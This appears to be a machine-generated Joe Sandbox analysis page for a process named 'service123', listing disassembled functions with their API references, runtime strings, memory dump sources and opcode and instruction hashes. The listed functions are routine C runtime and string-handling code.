Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: signal
String ID:
API String ID: 1946981877-0
Opcode ID: 4eb31229ca8915fe5eaedc726b92fde0228945574cf582c17609eaaf2772dad9
Instruction ID: 97e15749b5c9a97606589aacd0a27b8e24c87152ea5bacc3d23c3d3d694bda17
Opcode Fuzzy Hash: 4eb31229ca8915fe5eaedc726b92fde0228945574cf582c17609eaaf2772dad9
Instruction Fuzzy Hash: 1931EC706082019AE7206F64C954B2EB6E4BF46358F174D1EE8C5D7282DB7DC8C99B93

Function 6C2C4A30 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 6C2C4A48

Strings

Inf, xrefs: 6C2C5505, 6C2C551D
NaN, xrefs: 6C2C540B
@, xrefs: 6C2C4D17

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: 05845eb8875b0438421583c062ff34bdea887ac99390854f716bd836f736163f
Instruction ID: d37c1cd9f8483f3dd239d47f5bd06ca91a549d2f0413fbd490df951f8130a9aa
Opcode Fuzzy Hash: 05845eb8875b0438421583c062ff34bdea887ac99390854f716bd836f736163f
Instruction Fuzzy Hash: 52F1AE7170C38A8BD7A18E28C4507ABBBE1AB85319F148B2DEDDC87791D735D9058B83

Function 00AC4360 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 399COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00AC4378

Strings

NaN, xrefs: 00AC4D3B
@, xrefs: 00AC4647
Inf, xrefs: 00AC4E35, 00AC4E4D

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: _errno
String ID: @$Inf$NaN
API String ID: 2918714741-141429178
Opcode ID: ab1959c6faa8f41fa56c400dca0ee2500d5eb75e36aa0fba4b7c08f41f3ffe7c
Instruction ID: ce7f7693a1c5f70e48191dfc19f85968a5475bb3c9f961a79b4c1a9416f7ae6d
Opcode Fuzzy Hash: ab1959c6faa8f41fa56c400dca0ee2500d5eb75e36aa0fba4b7c08f41f3ffe7c
Instruction Fuzzy Hash: 15F1C27560C3858BD7318F24C460BABBBE1BF89314F268A1DE9DD87381D7359905CB4A

Function 6C2C3830 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

0, xrefs: 6C2C3B96
@, xrefs: 6C2C3AFA

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction ID: 2588fecbfbf0ea5e0a2208518a272080f259abbc3da204c847238cdf307fb347
Opcode Fuzzy Hash: 852fd2e7f322feda59a9287ec6fcafc659018383277beee50283a5623e34e20d
Instruction Fuzzy Hash: 90C15A71B1461A8BDB44CF69C4807CDBBB1BF89318F148B59EC58AB785D334E805CB92

Function 00AC3160 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 295COMMON

Download Yara Rule

Strings

0, xrefs: 00AC34C6
@, xrefs: 00AC342A

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID:
String ID: 0$@
API String ID: 0-1545510068
Opcode ID: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction ID: f77e5493187c9473c1794812bacf3ada926897254ef9e5e7305e6a5bbe8ab30d
Opcode Fuzzy Hash: e57f9d77be607eb7be2d65c7f691f863806e0b74bc638be5844c6890f5152d77
Instruction Fuzzy Hash: F7C14672A002558BDF19CF6CC584B9DBBB1AF88314F2AC25DE859AF385D734E941CB90

Function 6C2DB810 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2DB836
memcmp.MSVCRT ref: 6C2DB85A
memcmp.MSVCRT ref: 6C2DB8CD
memcmp.MSVCRT ref: 6C2DB93F

Part of subcall function 6C37ADB0: strlen.MSVCRT ref: 6C37ADBE

memcmp.MSVCRT ref: 6C2DB9D7

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2DB881, 6C2DB8F2, 6C2DB965, 6C2DB9FE, 6C2DBA1A
basic_string::compare, xrefs: 6C2DB879, 6C2DB8EA, 6C2DB95D, 6C2DB9F6, 6C2DBA12

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: f9c2c5c30ed6e97d11de4eeb7468b1ff0da06e8b4a70edc67441a8bb0ede2947
Instruction ID: 1de1c443b803ad8468165071b33a9455e83c17eca255e584b43416ffe9079e45
Opcode Fuzzy Hash: f9c2c5c30ed6e97d11de4eeb7468b1ff0da06e8b4a70edc67441a8bb0ede2947
Instruction Fuzzy Hash: E861437560A3169FC304AF29C99195ABBE5BF98648F15892DF9C9C7710E231E880CF92

Function 6C2D7710 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 211stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C323320: memset.MSVCRT ref: 6C323365

strcmp.MSVCRT ref: 6C2D7771
strlen.MSVCRT ref: 6C2D778C
strlen.MSVCRT ref: 6C2D77D3
strlen.MSVCRT ref: 6C2D7844
strlen.MSVCRT ref: 6C2D78B2

Strings

*, xrefs: 6C2D7990

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen$memsetstrcmp
String ID: *
API String ID: 3639840916-163128923
Opcode ID: f6ce6da898d9add60550d541adfea6fcda4797c3c9f5c825a1a1df0c4bac2ba5
Instruction ID: 4e78f193218dc944e5ce29157de02c2a7776f67e505ba2fecb84ca856bcd8a19
Opcode Fuzzy Hash: f6ce6da898d9add60550d541adfea6fcda4797c3c9f5c825a1a1df0c4bac2ba5
Instruction Fuzzy Hash: 168158B5A056058FDB00EF29C488A9EFBF5FF85708F0185ADD8949B714D739A849CF82

Function 6C2BE8E0 Relevance: 10.7, APIs: 7, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction ID: 14724fe59b18633106ae7f288888c1d0fcd33b826258822c692da6d86c990e68
Opcode Fuzzy Hash: 6949fccd0a9c3e9d3ac8c5b45f2aac2a255c09ca815fc16772279bff97c29dd2
Instruction Fuzzy Hash: A8518D7050970A8FD710DF19C08065AB7E4BF8938DF448A9AFC99AB741D730D909CB96

Function 6C2BE340 Relevance: 10.6, APIs: 7, Instructions: 126synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C2BE487
WaitForSingleObject.KERNEL32 ref: 6C2BE4C8

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 43bddd6449bb27fa46a9d16a3a1c667099a46ce764393e41a671b6f2a43f21aa
Instruction ID: 6fd0347935421334a18a60b6695fe1378d314c2e5ba48a4b4b68fd9e633543c1
Opcode Fuzzy Hash: 43bddd6449bb27fa46a9d16a3a1c667099a46ce764393e41a671b6f2a43f21aa
Instruction Fuzzy Hash: 7F5126707062068BDB10DF39C5847667BF8BF0634DF1085A9EC59AB685D770E4058BA2

Function 6C2C01F0 Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2C0209
memcpy.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C2C022D
malloc.MSVCRT ref: 6C2C0247
memset.MSVCRT ref: 6C2C0275
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort$malloc$memcpymemset
String ID:
API String ID: 334492700-0
Opcode ID: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction ID: 7cb2e2ddd46e76c3e84f157f4aa5899d611db32e53922146dbca29c71ad7cf2b
Opcode Fuzzy Hash: e6d7780d917140ca2a5588e03258049156473324d9afcb76f04c1c6ed51653e4
Instruction Fuzzy Hash: E1114FB27056499ED740BFA9D880899B7E8EF4429DF058A7DDC4887B01E731D5188A62

Function 00AC8120 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00AC812C
GetProcAddress.KERNEL32 ref: 00AC814C
GetProcAddress.KERNEL32 ref: 00AC818B

Strings

___lc_codepage_func, xrefs: 00AC8144
__lc_codepage, xrefs: 00AC8180
msvcrt.dll, xrefs: 00AC8125

Memory Dump Source

Source File: 00000004.00000002.2951693588.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000004.00000002.2951678920.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951709627.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951725080.0000000000ACE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.2951741403.0000000000AD1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ac0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 238209ab70387f79d9be1146f4b7a35d9ade83c6034ed0e3f95cadebfb2573ed
Instruction ID: 17093e958fd1d689e36ac07a6aa6cd62cddc6df363465ec8b981a5c821b130f5
Opcode Fuzzy Hash: 238209ab70387f79d9be1146f4b7a35d9ade83c6034ed0e3f95cadebfb2573ed
Instruction Fuzzy Hash: 1CF06DB1905214CF9B00BFB86D08B5B7AF0BA04354F0B463EC885C7200EA788456CBA3

Function 6C2C9171 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C2C917C
GetProcAddress.KERNEL32 ref: 6C2C919C
GetProcAddress.KERNEL32 ref: 6C2C91DB

Strings

msvcrt.dll, xrefs: 6C2C9175
___lc_codepage_func, xrefs: 6C2C9194
__lc_codepage, xrefs: 6C2C91D0

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ___lc_codepage_func$__lc_codepage$msvcrt.dll
API String ID: 667068680-1145701848
Opcode ID: 0209f0d5d65a3d3676b01c106bad763be784722fd396e604d28d7cace95c46a3
Instruction ID: 9a151448c58bc1c414442894d89825247c7cad66ad493fdc8bed93b26b8190c7
Opcode Fuzzy Hash: 0209f0d5d65a3d3676b01c106bad763be784722fd396e604d28d7cace95c46a3
Instruction Fuzzy Hash: 57F062B1A4520A8FAB407F3C594B24A7BF4AA06219F40067ADD89CB604E6B0D424CFA3

Function 6C2BEA9B Relevance: 10.5, APIs: 7, Instructions: 21COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D60
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D65
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6A
abort.MSVCRT(?,?,?,?,?,?,6C2BE2F4,?,?,?,?,?,?,00000000,00000001,6C2C008D), ref: 6C386D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C2C038F), ref: 6C386D7E

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction ID: 81d4de5b2514eae0a5327635d72452a75613782366f3663cda09e94c974bcf7f
Opcode Fuzzy Hash: 1e0c335cc361dda1bc33d437742637b5b623609a86091116d78be9412fd93d2e
Instruction Fuzzy Hash: D0B01232DEA22DCA8420757C0910080621DEA173CD7049983CC4A73D049331E04B58B3

Function 6C354AE0 Relevance: 10.2, APIs: 8, Instructions: 158COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C35B8AE), ref: 6C354B63
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C35B8AE), ref: 6C354BA5

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction ID: d165b9a4fe28f8e140a9068248c98e5c8a4e40d1509af35cfbd9cccce6713122
Opcode Fuzzy Hash: 7118f199aca9bda872a9f066d4d2f0c5f0939fc9cd3f83570954fc8ac8eae853
Instruction Fuzzy Hash: A26109B4A09705CFC718DF29C190A1AFBE0AF88758F50891DE4DA87760E731E864CF52

Function 6C350970 Relevance: 10.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C2E92A3,00000003), ref: 6C3509ED
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6C2E92A3,00000003), ref: 6C350A2C

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction ID: a2c7e69dda2832f62c3fe87acc15940b41851d18c34fe5176f23147fce0d991c
Opcode Fuzzy Hash: 8eeda5daa0903fc6a0a1b83168d6405fc1266b630737f5cb9a0f8ae4aa89840c
Instruction Fuzzy Hash: 7D61F3B4609746CFC704DF19C090A1AFBE0AF89758F10891EE8E98B765D332E854CF92

Function 6C352B90 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 232COMMON

Download Yara Rule

APIs

memcpy.MSVCRT(?,?,?,6C34736E), ref: 6C352C03

Strings

basic_string::basic_string, xrefs: 6C352D0C, 6C352D69
string::string, xrefs: 6C352DCE
basic_string::_M_create, xrefs: 6C352C1A, 6C352CBA
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C352D14, 6C352D71, 6C352DD6

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_create$basic_string::basic_string$string::string
API String ID: 3510742995-126128797
Opcode ID: aee7bd0e313e7a5d0a95944f221911752ca9d925e84353b8bda3450b40a6961c
Instruction ID: e38910b0a1c477e6f4956a088bfbf976e4e156a1d705b58aba35756ad4723a49
Opcode Fuzzy Hash: aee7bd0e313e7a5d0a95944f221911752ca9d925e84353b8bda3450b40a6961c
Instruction Fuzzy Hash: 8A715FB69093508FC300EF2CD58064AFBE4AF89218F55899ED9889B716D336D845CF92

Function 6C2BEB70 Relevance: 9.2, APIs: 6, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction ID: ef38eb7452e6e19e2b3900ca023d0de515055694e67873de069e8da88d296f13
Opcode Fuzzy Hash: 9ff8390f7064b2eec1ab42af84fa55342ea2eed4810115e48aac89551600db43
Instruction Fuzzy Hash: A661A07560930A8FC700CF19C48065AF7E5AF8839CF448E9DFC99ABB44D770E9468B96

Function 6C2CB060 Relevance: 9.1, APIs: 6, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C2CAF3F), ref: 6C385FF0
abort.MSVCRT(?,?,?,?,?,?,6C2CAE9C,?,?,?,?,?,?,6C386040), ref: 6C385FF8
abort.MSVCRT(?,?,?,?,?,?,6C2CAE9C,?,?,?,?,?,?,6C386040), ref: 6C386000
abort.MSVCRT(?,?,?,?,?,?,6C2CAE9C,?,?,?,?,?,?,6C386040), ref: 6C386008

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
